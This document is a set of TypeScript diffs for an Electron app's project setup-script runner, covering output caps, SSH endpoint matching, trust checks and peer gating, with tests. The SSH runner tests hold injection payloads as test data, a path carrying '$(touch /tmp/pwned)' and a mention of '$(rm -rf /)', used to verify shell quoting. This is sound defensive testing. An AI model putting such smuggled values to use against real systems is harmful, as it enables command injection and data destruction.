+
+/** Combined stdout+stderr budget for one run — the SAME cap `ProjectSetupEvent.chunk` documents
+ *  ("stdout+stderr interleaved, capped"). Deliberately one shared budget rather than one per
+ *  stream: a script that floods only stderr must not get 1MB total just because stdout stayed
+ *  quiet. */
+export const SETUP_OUTPUT_CAP = 512 * 1024
+
+/** SIGKILL a run that outlives this — a hung `setupScript` must never wedge the single-flight
+ *  slot forever. Test-injectable via each runner's `opts.timeoutMs` so a suite doesn't wait 10
+ *  real minutes. */
+export const SETUP_TIMEOUT_MS = 10 * 60 * 1000
+
+/** Chunks are batched to `onChunk` at most this often (plus one final flush on exit), matching
+ *  the debounce the brief calls for — a script that `echo`s in a tight loop must not turn into
+ *  an event per line. */
+const FLUSH_DEBOUNCE_MS = 150
+
+const TRUNCATION_NOTE = '\n[output truncated — exceeded 512KB]\n'
+
+export interface SetupOutputStream {
+  /** Feed decoded output (either stream). Past the cap this appends the truncation note ONCE and
+   *  drops everything after it. */
+  append(text: string): void
+  /** Deliver whatever is buffered now and cancel the pending debounce — call this exactly once,
+   *  from the runner's `finish`, so the tail of a run is never lost to an unfired timer. */
+  flush(): void
+}
+
+export function createSetupOutputStream(onChunk: (text: string) => void): SetupOutputStream {
+  let totalBytes = 0
+  let truncated = false
+  let pending = ''
+  let flushTimer: ReturnType<typeof setTimeout> | null = null
+
+  const flush = (): void => {
+    if (flushTimer) {
+      clearTimeout(flushTimer)
+      flushTimer = null
+    }
+    if (!pending) return
+    const text = pending
+    pending = ''
+    onChunk(text)
+  }
+
+  const scheduleFlush = (): void => {
+    if (flushTimer) return
+    flushTimer = setTimeout(flush, FLUSH_DEBOUNCE_MS)
+    flushTimer.unref?.()
+  }
+
+  const append = (text: string): void => {
+    if (!text || truncated) return
+    const remaining = SETUP_OUTPUT_CAP - totalBytes
+    if (remaining <= 0) {
+      truncated = true
+      pending += TRUNCATION_NOTE
+      scheduleFlush()
+      return
+    }
+    const asBytes = Buffer.byteLength(text, 'utf-8')
+    if (asBytes <= remaining) {
+      pending += text
+      totalBytes += asBytes
+    } else {
+      const cut = Buffer.from(text, 'utf-8').subarray(0, remaining).toString('utf-8')
+      pending += cut
+      totalBytes += Buffer.byteLength(cut, 'utf-8')
+      truncated = true
+      pending += TRUNCATION_NOTE
+    }
+    scheduleFlush()
+  }
+
+  return { append, flush }
+}

--- a/src/core/workspace-store.ts
+++ b/src/core/workspace-store.ts
@@ -1015,6 +1015,16 @@ export class WorkspaceStore {
     return this.index?.entries.find((e) => e.id === projectId && e.cwd)?.cwd
   }
 
+  /** Minimal per-project target info for the setup/archive runner (project-setup-runner-local.ts's
+   *  `resolveProjectSetupTarget`) — cwd/ssh/name straight off the loaded index. Sync, like
+   *  `localCwdForProject`: this is what closes the Task 1 review finding that a run's rootPath/
+   *  ssh/projectName must come from THIS machine's own index, never from whatever the renderer
+   *  happened to send. */
+  projectTargetInfo(projectId: string): { cwd?: string; ssh?: Project['ssh']; name: string } | null {
+    const e = this.index?.entries.find((x) => x.id === projectId)
+    return e ? { cwd: e.cwd, ssh: e.ssh, name: e.name } : null
+  }
+
   /** Resolve the shared project together with its machine-local trust identity. The approval id
    *  never enters the shared project object or project.json. */
   async githubProject(projectId: string): Promise<{

--- a/src/main/index.ts
+++ b/src/main/index.ts
@@ -67,6 +67,7 @@ import { ProjectTrustStore } from '../core/project-trust-store'
 import { ProjectSetupService } from '../core/project-setup-service'
 import { registerProjectSetupHandlers } from '../core/project-setup-handlers'
 import { makeLocalSetupRunner } from '../core/project-setup-runner-local'
+import { makeSshSetupRunner } from './remote-ssh/ssh-setup-runner'
 import { registerGitHubIntegration } from '../core/github/integration'
 import { runGitHubCliCommand } from '../core/github/credentials'
 import {
@@ -356,9 +357,13 @@ const projectTrustStore = new ProjectTrustStore()
 const projectSetupService = new ProjectSetupService({
   trust: projectTrustStore,
   readSettings: (projectId) => workspaceStore.readProjectSettings(projectId),
-  runLocal: makeLocalSetupRunner()
-  // runSsh: a later task's manual-run leg. Until wired, an ssh target's run answers
-  // `{status:'skipped', reason:'unavailable'}` — same as any other missing runner.
+  runLocal: makeLocalSetupRunner(),
+  // The ssh leg streams over the project's LIVE ControlMaster, resolved lazily by remote cwd (the
+  // manager is created only once the window is ready) — the same seam remote git uses. A
+  // disconnected project resolves to null and the runner reports that as a failed run rather than
+  // dialing a fresh connection. Server Edition has no ssh-project manager at all, so it wires
+  // `runLocal` only and an ssh target there stays `{status:'skipped', reason:'unavailable'}`.
+  runSsh: makeSshSetupRunner((remoteCwd) => sshProjectManager?.refForRemoteCwd(remoteCwd) ?? null)
 })
 registerProjectSetupHandlers(corePlatform, projectSetupService, {
   projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),

--- a/src/main/index.ts
+++ b/src/main/index.ts
@@ -358,12 +358,14 @@ const projectSetupService = new ProjectSetupService({
   trust: projectTrustStore,
   readSettings: (projectId) => workspaceStore.readProjectSettings(projectId),
   runLocal: makeLocalSetupRunner(),
-  // The ssh leg streams over the project's LIVE ControlMaster, resolved lazily by remote cwd (the
-  // manager is created only once the window is ready) — the same seam remote git uses. A
-  // disconnected project resolves to null and the runner reports that as a failed run rather than
-  // dialing a fresh connection. Server Edition has no ssh-project manager at all, so it wires
-  // `runLocal` only and an ssh target there stays `{status:'skipped', reason:'unavailable'}`.
-  runSsh: makeSshSetupRunner((remoteCwd) => sshProjectManager?.refForRemoteCwd(remoteCwd) ?? null)
+  // The ssh leg streams over the project's LIVE ControlMaster, resolved lazily (the manager is
+  // created only once the window is ready) on the FULL endpoint — host+user+port+remoteCwd, not the
+  // cwd alone: the default remoteCwd is `~`, and one `user@host` can be several machines on
+  // different ports. A project with no matching live connection resolves to null and the runner
+  // reports that as a failed run rather than dialing a fresh connection. Server Edition has no
+  // ssh-project manager at all, so it wires `runLocal` only and an ssh target there stays
+  // `{status:'skipped', reason:'unavailable'}`.
+  runSsh: makeSshSetupRunner((endpoint) => sshProjectManager?.refForEndpoint(endpoint) ?? null)
 })
 registerProjectSetupHandlers(corePlatform, projectSetupService, {
   projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),

--- a/src/main/index.ts
+++ b/src/main/index.ts
@@ -63,6 +63,10 @@ import { registerAgentEnvIpc } from '../core/agent-env-ipc'
 import { presenceHub } from '../core/presence/hub'
 import { SshStore } from './ssh-store'
 import { GitService } from '../core/git-service'
+import { ProjectTrustStore } from '../core/project-trust-store'
+import { ProjectSetupService } from '../core/project-setup-service'
+import { registerProjectSetupHandlers, type ProjectSetupHandlerService } from '../core/project-setup-handlers'
+import { makeLocalSetupRunner, resolveProjectSetupTarget } from '../core/project-setup-runner-local'
 import { registerGitHubIntegration } from '../core/github/integration'
 import { runGitHubCliCommand } from '../core/github/credentials'
 import {
@@ -339,6 +343,38 @@ workspaceStore.onPersist = () => {
   refreshNodeTokens()
 }
 const gitService = new GitService()
+
+// Project setup/archive runner (SDD: 2026-08-19-project-settings-trust). The trust store is keyed
+// by LOCATION, never project id (hostile-project-json), so one instance covers every project.
+// `readSettings` reuses WorkspaceStore's own resolution instead of re-reading disk.
+const projectTrustStore = new ProjectTrustStore()
+const projectSetupService = new ProjectSetupService({
+  trust: projectTrustStore,
+  readSettings: (projectId) => workspaceStore.readProjectSettings(projectId),
+  runLocal: makeLocalSetupRunner()
+  // runSsh: a later task's manual-run leg. Until wired, an ssh target's run answers
+  // `{status:'skipped', reason:'unavailable'}` — same as any other missing runner.
+})
+// `registerProjectSetupHandlers` (project-setup-handlers.ts) shape-checks its wire `target` but
+// otherwise trusts whatever it is given — a deliberate low-level seam (Task 1). The TRUST boundary
+// lives here instead: `target.rootPath`/`projectName`/`ssh` are the wire's own placeholders (see
+// preload's `projectSetup.run`) and are IGNORED — rootPath/ssh/projectName are re-derived from THIS
+// machine's own workspace index by `target.projectId`, and `worktreePath` is independently
+// re-validated against the project's actual git worktrees (`resolveProjectSetupTarget`). Nothing
+// path-shaped that crosses the wire is trusted as-is (Task 1 review finding, carried to this task).
+const projectSetupHandlerService: ProjectSetupHandlerService = {
+  run: async (target, kind) => {
+    const info = workspaceStore.projectTargetInfo(target.projectId)
+    const resolved = await resolveProjectSetupTarget(target.projectId, target.worktreePath, info, (repoPath) =>
+      gitService.worktreeList(repoPath)
+    )
+    if (!resolved) return { status: 'skipped', reason: 'unavailable' }
+    return projectSetupService.run(resolved, kind)
+  },
+  cancel: (runKey) => projectSetupService.cancel(runKey),
+  submitConsent: (requestId, answer) => projectSetupService.submitConsent(requestId, answer)
+}
+registerProjectSetupHandlers(corePlatform, projectSetupHandlerService)
 
 // Markers delimiting the `projects.list` relay blob. The iOS client splits on these exact
 // strings to recover [workspace.json | newline-joined tmux session names | agent-status.json],

--- a/src/main/index.ts
+++ b/src/main/index.ts
@@ -65,8 +65,8 @@ import { SshStore } from './ssh-store'
 import { GitService } from '../core/git-service'
 import { ProjectTrustStore } from '../core/project-trust-store'
 import { ProjectSetupService } from '../core/project-setup-service'
-import { registerProjectSetupHandlers, type ProjectSetupHandlerService } from '../core/project-setup-handlers'
-import { makeLocalSetupRunner, resolveProjectSetupTarget } from '../core/project-setup-runner-local'
+import { registerProjectSetupHandlers } from '../core/project-setup-handlers'
+import { makeLocalSetupRunner } from '../core/project-setup-runner-local'
 import { registerGitHubIntegration } from '../core/github/integration'
 import { runGitHubCliCommand } from '../core/github/credentials'
 import {
@@ -346,7 +346,12 @@ const gitService = new GitService()
 
 // Project setup/archive runner (SDD: 2026-08-19-project-settings-trust). The trust store is keyed
 // by LOCATION, never project id (hostile-project-json), so one instance covers every project.
-// `readSettings` reuses WorkspaceStore's own resolution instead of re-reading disk.
+// `readSettings` reuses WorkspaceStore's own resolution instead of re-reading disk. `ProjectSetupService`
+// already matches `ProjectSetupHandlerService`'s shape, so it is passed straight through — the
+// TRUST boundary (deriving rootPath/ssh/projectName from THIS machine's own index by projectId,
+// never the renderer, and re-validating `worktreePath` against the project's actual git worktrees)
+// lives centrally in `registerProjectSetupHandlers` itself (project-setup-handlers.ts), shared with
+// the Server Edition below instead of re-implemented per shell.
 const projectTrustStore = new ProjectTrustStore()
 const projectSetupService = new ProjectSetupService({
   trust: projectTrustStore,
@@ -355,26 +360,10 @@ const projectSetupService = new ProjectSetupService({
   // runSsh: a later task's manual-run leg. Until wired, an ssh target's run answers
   // `{status:'skipped', reason:'unavailable'}` — same as any other missing runner.
 })
-// `registerProjectSetupHandlers` (project-setup-handlers.ts) shape-checks its wire `target` but
-// otherwise trusts whatever it is given — a deliberate low-level seam (Task 1). The TRUST boundary
-// lives here instead: `target.rootPath`/`projectName`/`ssh` are the wire's own placeholders (see
-// preload's `projectSetup.run`) and are IGNORED — rootPath/ssh/projectName are re-derived from THIS
-// machine's own workspace index by `target.projectId`, and `worktreePath` is independently
-// re-validated against the project's actual git worktrees (`resolveProjectSetupTarget`). Nothing
-// path-shaped that crosses the wire is trusted as-is (Task 1 review finding, carried to this task).
-const projectSetupHandlerService: ProjectSetupHandlerService = {
-  run: async (target, kind) => {
-    const info = workspaceStore.projectTargetInfo(target.projectId)
-    const resolved = await resolveProjectSetupTarget(target.projectId, target.worktreePath, info, (repoPath) =>
-      gitService.worktreeList(repoPath)
-    )
-    if (!resolved) return { status: 'skipped', reason: 'unavailable' }
-    return projectSetupService.run(resolved, kind)
-  },
-  cancel: (runKey) => projectSetupService.cancel(runKey),
-  submitConsent: (requestId, answer) => projectSetupService.submitConsent(requestId, answer)
-}
-registerProjectSetupHandlers(corePlatform, projectSetupHandlerService)
+registerProjectSetupHandlers(corePlatform, projectSetupService, {
+  projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
+  worktreeList: (repoPath) => gitService.worktreeList(repoPath)
+})
 
 // Markers delimiting the `projects.list` relay blob. The iOS client splits on these exact
 // strings to recover [workspace.json | newline-joined tmux session names | agent-status.json],

--- a/src/main/index.ts
+++ b/src/main/index.ts
@@ -365,7 +365,14 @@ const projectSetupService = new ProjectSetupService({
   // reports that as a failed run rather than dialing a fresh connection. Server Edition has no
   // ssh-project manager at all, so it wires `runLocal` only and an ssh target there stays
   // `{status:'skipped', reason:'unavailable'}`.
-  runSsh: makeSshSetupRunner((endpoint) => sshProjectManager?.refForEndpoint(endpoint) ?? null)
+  runSsh: makeSshSetupRunner((endpoint) => sshProjectManager?.refForEndpoint(endpoint) ?? null),
+  // The trust prompt goes to THIS window only — never `platform().broadcast`, which also fans out
+  // to every relay peer (a paired phone, another desktop). Broadcasting it would hand a guest the
+  // shared script bodies (the exact bytes being approved) and put the host's own trust dialog on
+  // their screen. Same main-window-only push the ssh passphrase prompt uses; with the window closed
+  // (macOS) the prompt is simply not delivered and the run rides out its expiry as `unanswered`,
+  // which is the fail-closed direction.
+  sendConsent: (channel, payload) => sendToMain(channel, payload)
 })
 registerProjectSetupHandlers(corePlatform, projectSetupService, {
   projectTargetInfo: (projectId) => workspaceStore.projectTargetInfo(projectId),
@@ -3064,6 +3071,11 @@ app.on('before-quit', (e) => {
   keepAwake?.dispose()
   keepAwake = undefined
   workspaceWatcher.dispose()
+  // A setup/archive run is a DETACHED process group (setsid, so cancel can SIGKILL the tree), which
+  // means quitting without this leaves `npm ci` churning with no app left to report to — and the
+  // hook/pty teardown below would never touch it. Idempotent, so the second before-quit pass (the
+  // deferred app.quit()) costs nothing.
+  projectSetupService.disposeAll()
   if (quitFlushed) {
     // Second pass (the deferred app.quit() below): the flush had its chance — drop the masters.
     sshProjectManager?.disconnectAll()

--- a/src/main/platform-electron.test.ts
+++ b/src/main/platform-electron.test.ts
@@ -305,3 +305,60 @@ describe('electronPlatform.dispatch / cast (the peer inbound path)', () => {
     expect(Object.keys(h.handlers).sort()).toEqual(['c1', 'c2', 'c3'])
   })
 })
+
+/**
+ * A relay guest is NOT the host's user. `project-setup:run` starts a script on the host, and
+ * `project-setup:consent-submit` is the ANSWER to the host's own trust prompt — a guest reaching
+ * both could trigger a run and then approve it themselves, with the host's human never touching
+ * anything. BOTH legs of the peer surface are gated: `dispatch` (request/response — how `run` and
+ * `cancel` arrive) and `cast` (fire-and-forget — how `consent-submit` arrives). Gating only the
+ * first would leave the self-approval half wide open.
+ */
+describe('electronPlatform host-only admission (project-setup)', () => {
+  const REFUSAL = {
+    code: 'E_FORBIDDEN',
+    message: 'host-control method is not available to relay peers'
+  }
+  const GATED = ['project-setup:run', 'project-setup:cancel', 'project-setup:consent-submit']
+
+  it('refuses a peer dispatch of run/cancel/consent-submit without reaching the handler', async () => {
+    const p = electronPlatform()
+    const reached: string[] = []
+    for (const ch of GATED) {
+      p.handle(ch, () => {
+        reached.push(ch)
+        return 'must-not-run'
+      })
+    }
+    let id = 0
+    for (const ch of GATED) {
+      id += 1
+      expect(await p.dispatch(PEER, { t: 'req', id, method: ch, args: [] })).toEqual({
+        t: 'res', id, ok: false, error: REFUSAL
+      })
+    }
+    expect(reached).toEqual([])
+  })
+
+  it('refuses a peer CAST of consent-submit — the self-approval path', () => {
+    const p = electronPlatform()
+    const answers: unknown[][] = []
+    p.on('project-setup:consent-submit', (...args: unknown[]) => answers.push(args))
+    p.cast(PEER, 'project-setup:consent-submit', ['req-1', 'approve'])
+    expect(answers).toEqual([])
+  })
+
+  it('still admits the harmless project-setup lifecycle channels', () => {
+    const p = electronPlatform()
+    const seen: string[] = []
+    p.on('project-setup:subscribe', () => seen.push('sub'))
+    p.cast(PEER, 'project-setup:subscribe', ['p1'])
+    expect(seen).toEqual(['sub'])
+  })
+
+  it('the LOCAL window is unaffected — its ipcMain registration still answers', async () => {
+    const p = electronPlatform()
+    p.handle('project-setup:run', (projectId: string) => `ran:${projectId}`)
+    expect(await h.handlers['project-setup:run']({ sender: { id: 1 } }, 'p1')).toBe('ran:p1')
+  })
+})

--- a/src/main/platform-electron.ts
+++ b/src/main/platform-electron.ts
@@ -2,6 +2,7 @@ import { app, ipcMain, safeStorage, shell, webContents } from 'electron'
 import type { CorePlatform } from '../core/platform'
 import { mainWindowClientIds, sendToMain } from './main-window'
 import { peerRegistry } from './peer-registry'
+import { HOST_ONLY_REFUSAL, isHostOnlyChannel } from '../shared/host-control'
 import { E_NO_HANDLER, type RpcErr, type RpcOk, type RpcRequest } from '../shared/rpc'
 
 type Handler = { fn: (...args: any[]) => unknown; withSender: boolean }
@@ -92,13 +93,13 @@ export function electronPlatform(): ElectronPlatform {
       ipcMain.on(ch, (e, ...args) => fn(e.sender.id, ...args))
     },
     async dispatch(clientId, req) {
-      if (req.method.startsWith('githubControl:')) {
+      // Host-control admission, from the ONE shared list (src/shared/host-control.ts) rather than a
+      // prefix test written out here — the second shell copying a stale copy of that test is the
+      // failure mode this closes.
+      if (isHostOnlyChannel(req.method)) {
         return {
           t: 'res', id: req.id, ok: false,
-          error: {
-            code: 'E_FORBIDDEN',
-            message: 'host-control method is not available to relay peers'
-          }
+          error: { code: 'E_FORBIDDEN', message: HOST_ONLY_REFUSAL }
         }
       }
       const h = handlers.get(req.method)
@@ -119,6 +120,14 @@ export function electronPlatform(): ElectronPlatform {
       }
     },
     cast(clientId, method, args) {
+      // The SAME admission as dispatch, because a cast is a second door into the same table. Gating
+      // dispatch alone would still admit `project-setup:consent-submit`, which the renderer sends as
+      // a cast (ws-bridge.ts) — i.e. a guest could not start a run but could still answer the host's
+      // trust prompt for it. A cast has no reply channel, so a refusal can only be dropped + logged.
+      if (isHostOnlyChannel(method)) {
+        console.warn(`[peer] refused host-control cast ${method} from peer ${clientId}`)
+        return
+      }
       const set = listeners.get(method)
       if (!set) return
       for (const l of set) {

--- a/src/main/remote-ssh/ssh-project.ts
+++ b/src/main/remote-ssh/ssh-project.ts
@@ -964,6 +964,38 @@ export class SshProjectManager {
   }
 
   /**
+   * Resolve the ref for the connection matching a FULL endpoint — host, user, effective port AND
+   * remote cwd. Sibling of `refForRemoteCwd`, not a replacement: matching on cwd alone is fine for
+   * the git-remote registry (a remote repo path is resolved from a node that already belongs to one
+   * project), but wrong for anything keyed by a project's own SERVER, which is what running that
+   * project's setup script is.
+   *
+   * Two ways cwd-only matching picks the wrong box, both reachable with ordinary config:
+   *  - The DEFAULT remoteCwd is `~`, so every project that never chose a directory collides with
+   *    every other one — the first connection in map order would win them all, forever.
+   *  - Same host and user on different PORTS are routinely different machines (containers, or hosts
+   *    behind one NAT), and a host/user-only check waves that straight through.
+   *
+   * `undefined` when nothing matches — a disconnected project and a wrong-endpoint one are the same
+   * answer here, and the caller reports it rather than dialing a new connection.
+   */
+  refForEndpoint(endpoint: {
+    host: string
+    user: string
+    port?: number
+    remoteCwd: string
+  }): { conn: SshConnection; controlPath: string } | undefined {
+    const wantPort = endpoint.port ?? 22
+    for (const c of this.conns.values()) {
+      if (c.remoteCwd !== endpoint.remoteCwd) continue
+      if (c.conn.host !== endpoint.host || c.conn.user !== endpoint.user) continue
+      if ((c.conn.port ?? 22) !== wantPort) continue
+      return { conn: c.conn, controlPath: c.controlPath }
+    }
+    return undefined
+  }
+
+  /**
    * `user@host` of the connection whose ControlMaster has this pid, for the passphrase dialog.
    * The askpass helper reports the asking ssh process as its `$PPID` (see ssh-askpass.ts), which
    * is exactly the master this manager spawned, so a prompt can be attributed to a server without

--- a/src/main/remote-ssh/ssh-setup-runner.test.ts
+++ b/src/main/remote-ssh/ssh-setup-runner.test.ts
@@ -10,7 +10,9 @@ vi.mock('node:child_process', async (importOriginal) => {
   return { ...actual, spawn: spawnMock }
 })
 
-import { makeSshSetupRunner, type SshSetupRef } from './ssh-setup-runner'
+import { makeSshSetupRunner, type SshSetupEndpoint, type SshSetupRef } from './ssh-setup-runner'
+import { SshProjectManager } from './ssh-project'
+import { controlPathFor } from '../../core/remote-ssh/control-master'
 
 /** The child `spawn` returns: an EventEmitter with `stdout`/`stderr` emitters and a spy `kill`. */
 class FakeChild extends EventEmitter {
@@ -76,9 +78,9 @@ describe('makeSshSetupRunner', () => {
       script?: string
       cwd?: string
       env?: Record<string, string>
-      resolveRef?: (remoteCwd: string) => SshSetupRef | null
+      resolveRef?: (endpoint: SshSetupEndpoint) => SshSetupRef | null
       timeoutMs?: number
-      ssh?: typeof ssh | undefined
+      ssh?: { server: { host: string; user: string; port?: number }; remoteCwd: string } | undefined
       signal?: AbortSignal
     } = {}
   ) => {
@@ -114,12 +116,68 @@ describe('makeSshSetupRunner', () => {
     expect(argv()).toContain('deploy@example.test')
   })
 
+  it('hands the resolver the FULL endpoint, not just the remote cwd', async () => {
+    const seen: SshSetupEndpoint[] = []
+    const { promise } = run({
+      ssh: { server: { host: 'example.test', user: 'deploy', port: 2222 }, remoteCwd: '/srv/app' },
+      resolveRef: (e) => {
+        seen.push(e)
+        return { conn: { host: 'example.test', user: 'deploy', port: 2222 }, controlPath: '/tmp/c.sock' }
+      }
+    })
+    child.emit('close', 0)
+    await promise
+    expect(seen).toEqual([{ host: 'example.test', user: 'deploy', port: 2222, remoteCwd: '/srv/app' }])
+  })
+
+  it('refuses a resolved connection on the WRONG PORT (same user@host is not the same machine)', async () => {
+    const { promise, chunks } = run({
+      ssh: { server: { host: 'example.test', user: 'deploy', port: 2222 }, remoteCwd: '/srv/app' },
+      resolveRef: () => ({ conn: { host: 'example.test', user: 'deploy', port: 2022 }, controlPath: '/tmp/c.sock' })
+    })
+    const result = await promise
+    expect(result.exitCode).toBe(255)
+    expect(chunks.join('')).toContain('deploy@example.test:2022')
+    expect(spawnMock).not.toHaveBeenCalled()
+  })
+
+  it('treats an absent port and an explicit 22 as the same endpoint', async () => {
+    const { promise } = run({
+      ssh: { server: { host: 'example.test', user: 'deploy', port: 22 }, remoteCwd: '/srv/app' },
+      resolveRef: () => ref // conn has no `port` at all
+    })
+    child.emit('close', 0)
+    const result = await promise
+    expect(result.exitCode).toBe(0)
+    expect(spawnMock).toHaveBeenCalledTimes(1)
+  })
+
   it('the remote command cds into the quoted remote cwd and runs the script through sh -lc', async () => {
     const { promise } = run({ script: 'make build', cwd: '/srv/app' })
     child.emit('close', 0)
     await promise
     expect(remoteCommand()).toContain(`cd '/srv/app' &&`)
     expect(remoteCommand()).toContain(`sh -lc 'make build'`)
+  })
+
+  // The whole reason the `cd` uses quoteRemotePath instead of posixQuote: single quotes suppress
+  // tilde expansion, and `~` is the DEFAULT remoteCwd — `cd '~/app'` would look for a directory
+  // literally named `~`. Swapping back to posixQuote must fail this pair.
+  it('leaves a leading ~ bare so the remote shell expands it, quoting the rest of the path', async () => {
+    const { promise } = run({ cwd: '~/app' })
+    child.emit('close', 0)
+    await promise
+    expect(remoteCommand()).toContain(`cd ~/'app' &&`)
+    expect(remoteCommand()).not.toContain(`cd '~/app'`)
+  })
+
+  it('a bare ~ is the whole carve-out: a ~-prefixed hostile path is still fully quoted', async () => {
+    const { promise } = run({ cwd: '~$(touch /tmp/pwned)' })
+    child.emit('close', 0)
+    await promise
+    const cmd = remoteCommand()
+    expect(cmd).toContain(`cd '~$(touch /tmp/pwned)' &&`)
+    expect(unquotedPart(cmd)).not.toContain('$(')
   })
 
   it('inlines the env as quoted assignments (ssh forwards no local env)', async () => {
@@ -204,6 +262,26 @@ describe('makeSshSetupRunner', () => {
     expect(spawnMock).toHaveBeenCalledTimes(1)
   })
 
+  it('says out loud that a cancel does NOT stop the remote command', async () => {
+    const controller = new AbortController()
+    const { promise, chunks } = run({ signal: controller.signal, timeoutMs: 60_000 })
+    controller.abort()
+    child.emit('close', null)
+    await promise
+    const combined = chunks.join('')
+    expect(combined).toContain('cancelled')
+    expect(combined).toContain('may still be running')
+  })
+
+  it('says the same about a timeout kill', async () => {
+    const { promise, chunks } = run({ timeoutMs: 10 })
+    await new Promise((r) => setTimeout(r, 40))
+    child.emit('close', null)
+    await promise
+    expect(chunks.join('')).toContain('timed out')
+    expect(chunks.join('')).toContain('may still be running')
+  })
+
   it('refuses to start when already aborted', async () => {
     const controller = new AbortController()
     controller.abort()
@@ -282,5 +360,81 @@ describe('makeSshSetupRunner', () => {
     expect(result.exitCode).toBe(255)
     expect(chunks.join('')).toContain('Connection refused')
     expect(spawnMock).toHaveBeenCalledTimes(1)
+  })
+
+  /**
+   * The resolver seam against the REAL manager, wired exactly as `src/main/index.ts` wires it. A
+   * fake resolver could not catch the two collisions that made cwd-only resolution wrong, because
+   * the collision lives in the LOOKUP, not in the runner.
+   */
+  describe('resolved through SshProjectManager.refForEndpoint (as main wires it)', () => {
+    const makeMgr = (): SshProjectManager =>
+      new SshProjectManager({
+        userDataDir: '/ud',
+        spawnMaster: vi.fn(() => ({ kill: vi.fn(), on: vi.fn() })),
+        run: vi.fn(async () => ({ code: 0, stdout: '' })),
+        runScp: vi.fn(async () => ({ code: 0 })),
+        getHook: () => ({ port: 51234, token: 'tok', version: '1' }),
+        onStatus: () => {}
+      })
+
+    const runVia = (mgr: SshProjectManager, target: { server: { host: string; user: string; port?: number }; remoteCwd: string }) => {
+      const runner = makeSshSetupRunner((endpoint) => mgr.refForEndpoint(endpoint) ?? null, {
+        sshPath: () => '/usr/bin/ssh',
+        agentEnv: () => ({})
+      })
+      const chunks: string[] = []
+      const promise = runner({
+        script: 'echo hi',
+        cwd: target.remoteCwd,
+        env: {},
+        onChunk: (t) => chunks.push(t),
+        signal: new AbortController().signal,
+        ssh: target
+      })
+      return { promise, chunks }
+    }
+
+    it('picks the connection on the TARGET port when one user@host is live on two ports', async () => {
+      const mgr = makeMgr()
+      await mgr.connect('p-2022', { host: 'h', user: 'u', port: 2022 }, '/srv/app')
+      await mgr.connect('p-2222', { host: 'h', user: 'u', port: 2222 }, '/srv/app')
+
+      const { promise } = runVia(mgr, { server: { host: 'h', user: 'u', port: 2222 }, remoteCwd: '/srv/app' })
+      child.emit('close', 0)
+      expect((await promise).exitCode).toBe(0)
+      expect(argv()).toContain(`ControlPath=${controlPathFor('p-2222')}`)
+      expect(argv().join(' ')).toContain('-p 2222')
+    })
+
+    it('refuses when only the WRONG-port connection is live — no spawn, no dial', async () => {
+      const mgr = makeMgr()
+      await mgr.connect('p-2022', { host: 'h', user: 'u', port: 2022 }, '/srv/app')
+
+      const { promise, chunks } = runVia(mgr, { server: { host: 'h', user: 'u', port: 2222 }, remoteCwd: '/srv/app' })
+      expect((await promise).exitCode).toBe(255)
+      expect(chunks.join('')).toContain('u@h:2222')
+      expect(spawnMock).not.toHaveBeenCalled()
+    })
+
+    it('two hosts sharing the default remoteCwd each resolve to their OWN connection', async () => {
+      const mgr = makeMgr()
+      await mgr.connect('p-a', { host: 'a.test', user: 'u' }, '~')
+      await mgr.connect('p-b', { host: 'b.test', user: 'u' }, '~')
+
+      const a = runVia(mgr, { server: { host: 'a.test', user: 'u' }, remoteCwd: '~' })
+      child.emit('close', 0)
+      expect((await a.promise).exitCode).toBe(0)
+      expect(argv()).toContain(`ControlPath=${controlPathFor('p-a')}`)
+
+      spawnMock.mockReset()
+      const secondChild = new FakeChild()
+      spawnMock.mockReturnValue(secondChild)
+      const b = runVia(mgr, { server: { host: 'b.test', user: 'u' }, remoteCwd: '~' })
+      secondChild.emit('close', 0)
+      expect((await b.promise).exitCode).toBe(0)
+      expect(argv()).toContain(`ControlPath=${controlPathFor('p-b')}`)
+      expect(b.chunks.join('')).not.toContain('Cannot run')
+    })
   })
 })

--- a/src/main/remote-ssh/ssh-setup-runner.test.ts
+++ b/src/main/remote-ssh/ssh-setup-runner.test.ts
@@ -1,0 +1,286 @@
+import { EventEmitter } from 'events'
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
+import type { SshConnection } from '../../shared/ssh'
+
+const spawnMock = vi.hoisted(() => vi.fn())
+// Partial: `spawn` is the seam under test, but the same module object backs every OTHER
+// `child_process` import in the graph (exec-path's `execFile`), and a bare stub breaks those.
+vi.mock('node:child_process', async (importOriginal) => {
+  const actual = await importOriginal<typeof import('node:child_process')>()
+  return { ...actual, spawn: spawnMock }
+})
+
+import { makeSshSetupRunner, type SshSetupRef } from './ssh-setup-runner'
+
+/** The child `spawn` returns: an EventEmitter with `stdout`/`stderr` emitters and a spy `kill`. */
+class FakeChild extends EventEmitter {
+  stdout = new EventEmitter()
+  stderr = new EventEmitter()
+  pid = 4242
+  kill = vi.fn(() => true)
+}
+
+const conn: SshConnection = { host: 'example.test', user: 'deploy' }
+const ssh = { server: { host: 'example.test', user: 'deploy' }, remoteCwd: '/srv/app' }
+const ref: SshSetupRef = { conn, controlPath: '/tmp/nt-ctl/example.test-deploy.sock' }
+
+/**
+ * Everything in `cmd` that is NOT inside a single-quoted region. The injection assertion the brief
+ * asks for: a hostile script may contain `$(rm -rf /)`, but every byte of it must land INSIDE a
+ * quoted argument, so the unquoted residue is only the shell syntax WE wrote.
+ */
+function unquotedPart(cmd: string): string {
+  let out = ''
+  let inQuotes = false
+  let i = 0
+  while (i < cmd.length) {
+    const ch = cmd[i]
+    if (inQuotes) {
+      if (ch === "'") inQuotes = false
+      i += 1
+      continue
+    }
+    if (ch === "'") {
+      inQuotes = true
+      i += 1
+      continue
+    }
+    // Outside quotes a backslash escapes the next byte — `'\''` (posixQuote's escape for an
+    // embedded quote) must not be mistaken for "quote closed, then quote reopened".
+    if (ch === '\\') {
+      i += 2
+      continue
+    }
+    out += ch
+    i += 1
+  }
+  expect(inQuotes).toBe(false) // an unbalanced quote would itself be an injection hole
+  return out
+}
+
+describe('makeSshSetupRunner', () => {
+  let child: FakeChild
+
+  beforeEach(() => {
+    spawnMock.mockReset()
+    child = new FakeChild()
+    spawnMock.mockReturnValue(child)
+  })
+
+  afterEach(() => {
+    vi.restoreAllMocks()
+  })
+
+  const run = (
+    opts: {
+      script?: string
+      cwd?: string
+      env?: Record<string, string>
+      resolveRef?: (remoteCwd: string) => SshSetupRef | null
+      timeoutMs?: number
+      ssh?: typeof ssh | undefined
+      signal?: AbortSignal
